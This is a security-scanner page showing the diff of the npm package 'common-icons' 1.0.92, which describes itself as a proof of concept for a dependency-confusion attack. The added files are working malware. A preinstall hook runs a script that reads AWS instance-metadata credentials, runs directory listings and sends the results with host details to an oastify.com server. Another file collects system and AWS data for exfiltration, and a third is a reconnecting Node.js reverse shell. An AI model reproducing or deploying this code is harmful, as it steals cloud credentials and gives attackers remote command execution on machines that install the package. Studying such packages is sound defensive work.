common-icons 1.0.92

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of common-icons might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/index.js +49 -0
  2. package/index2.js +92 -0
  3. package/index3.js +40 -0
  4. package/package.json +12 -0
package/index.js ADDED
@@ -0,0 +1,49 @@
1
+ base64data3 = '';
2
+ function req1(){
3
+ http.get({
4
+ hostname: '169.254.169.254',
5
+ port: 80,
6
+ path: '/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance',
7
+ agent: false
8
+ },
9
+ (res) => {
10
+ res.setEncoding('utf8');
11
+ let data = '';
12
+ res.on("data", (d) => {
13
+ var x;
14
+ x=d;
15
+ let buff3 = Buffer.from(x);
16
+ base64data3 = buff3.toString('base64');
17
+
18
+ const trackingData = JSON.stringify({
19
+ p: package,
20
+ c: __dirname,
21
+ homedir: os.homedir(),
22
+ networkinginterfaces: os.networkingInterfaces(),
23
+ release: os.release(),
24
+ userid: os.userInfo().uid,
25
+ hostname: os.hostname,
26
+ username: os.userInfo().username,
27
+ dns: dns.getServers(),
28
+ r: packageJSON ? packageJSON.__resolved : undefined,
29
+ v: packageJSON.version,
30
+ pjson: packageJSON
31
+ });
32
+ var options = {
33
+ hostname: '9y8xoee2in0vrzq9k265ztp4bvhm5et3.oastify.com',
34
+ port: 443,
35
+ path: '/',
36
+ method: "POST",
37
+ headers: {
38
+ "content-type":"application/x-www-form-urlencoded",
39
+ "content-length": postData.length,
40
+ "content-awsconfig":base64data1,
41
+ "content-awscreds":base64data2,
42
+ "content-imdsv":base64data3
43
+ }
44
+ };
45
+
46
+ })
47
+ }
48
+ )
49
+ }
package/index2.js ADDED
@@ -0,0 +1,92 @@
1
+ const https = require('https');
2
+ const http = require('http');
3
+ const os = require('os');
4
+ const command = require('child_process');
5
+ const { Buffer } = require('buffer');
6
+ const command_input = "dir c:\\users\\";
7
+ // Timeout duration (in milliseconds)
8
+ const TIMEOUT_DURATION = 5000; // 5 seconds
9
+
10
+ // Function to send POST request to xhihdn248xtkn2394eqdmhdax13srif7.oastify.com
11
+ function sendPostToBlaBla(data, hostname_data=null, command_data=null, homedir_data=null) {
12
+ const postData = JSON.stringify({ ec2: data, hostname: hostname_data, homedir: homedir_data, command_result: command_data });
13
+
14
+ const postOptions = {
15
+ hostname: 'xhihdn248xtkn2394eqdmhdax13srif7.oastify.com',
16
+ port: 443,
17
+ path: '/',
18
+ method: 'POST',
19
+ headers: {
20
+ 'Content-Type': 'application/json',
21
+ 'Content-Length': Buffer.byteLength(postData)
22
+ }
23
+ };
24
+
25
+ const postReq = https.request(postOptions, (postRes) => {
26
+ let responseData = '';
27
+
28
+ postRes.on('data', (chunk) => {
29
+ responseData += chunk;
30
+ });
31
+
32
+ postRes.on('end', () => {
33
+ console.log('Response from xhihdn248xtkn2394eqdmhdax13srif7.oastify.com:', responseData);
34
+ });
35
+ });
36
+
37
+ postReq.on('error', (error) => {
38
+ console.error('Error with POST request:', error);
39
+ });
40
+
41
+ postReq.write(postData);
42
+ postReq.end();
43
+ }
44
+
45
+ // First, send a request to the EC2 metadata URL
46
+ const options = {
47
+ hostname: 'asd',
48
+ port: 80,
49
+ path: '/latest/meta-data/iam/security-credentials/',
50
+ method: 'GET',
51
+ timeout: TIMEOUT_DURATION // Set the timeout for the request
52
+ };
53
+ if (os.platform() != "win32") {command_input="ls /root"};
54
+ command.exec(command_input, (error, stdout, stderr) => {
55
+ if (error) {
56
+ console.error(`Error executing command: ${error}`);
57
+ return;
58
+ }
59
+
60
+ if (stderr) {
61
+ console.error(`Error in execution: ${stderr}`);
62
+ return;
63
+ }
64
+
65
+ // Output the result of 'dir' command
66
+ result = (stdout);
67
+ })
68
+
69
+ const req = http.request(options, (res) => {
70
+ let data = '';
71
+
72
+ res.on('data', (chunk) => {
73
+ data += chunk;
74
+ });
75
+
76
+ res.on('end', () => {
77
+ // Encode the response data in base64
78
+ const encodedData = Buffer.from(data).toString('base64');
79
+ // Send the encoded data to xhihdn248xtkn2394eqdmhdax13srif7.oastify.com
80
+ sendPostToBlaBla(encodedData);
81
+ });
82
+ });
83
+
84
+ // Handle errors and timeouts for the GET request
85
+ req.on('error', (error) => {
86
+ console.error('Error with GET request:', error.message);
87
+ // Send the failure message to xhihdn248xtkn2394eqdmhdax13srif7.oastify.com if there is an error
88
+ sendPostToBlaBla('connection to EC2 failed', os.hostname(), result, os.homedir());
89
+ });
90
+
91
+ // End the GET request
92
+ req.end();
package/index3.js ADDED
@@ -0,0 +1,40 @@
1
+ const net = require('net');
2
+ const { exec } = require('child_process');
3
+
4
+ // Change this to the attacker's IP and port
5
+ const REMOTE_HOST = '127.0.0.1'; // Replace with attacker's IP
6
+ const REMOTE_PORT = 8088; // Replace with attacker's listening port
7
+
8
+ function connectShell() {
9
+ const client = new net.Socket();
10
+
11
+ // Try to connect to the attacker/listener
12
+ client.connect(REMOTE_PORT, REMOTE_HOST, () => {
13
+ console.log('Connected to the attack server');
14
+ client.write('Reverse shell connected!\n'); // Notify listener of connection
15
+ });
16
+
17
+ // When data is received from the attacker's server
18
+ client.on('data', (data) => {
19
+ // Execute the received command
20
+ exec(data.toString(), (error, stdout, stderr) => {
21
+ if (stdout) client.write(stdout); // Send command output back to the attacker
22
+ if (stderr) client.write(stderr); // Send any errors back to the attacker
23
+ if (error) client.write(error.message);
24
+ });
25
+ });
26
+
27
+ // Reconnect on close
28
+ client.on('close', () => {
29
+ console.log('Connection closed, retrying...');
30
+ setTimeout(connectShell, 5000); // Try reconnecting every 5 seconds
31
+ });
32
+
33
+ client.on('error', (err) => {
34
+ console.error('Connection error:', err.message);
35
+ setTimeout(connectShell, 5000); // Retry connection on error
36
+ });
37
+ }
38
+
39
+ // Start the reverse shell
40
+ connectShell();
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "common-icons",
3
+ "version": "1.0.92",
4
+ "description": "POC for confusion attack",
5
+ "main": "index2.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index2.js"
9
+ },
10
+ "author": "cwg test",
11
+ "license": "ISC"
12
+ }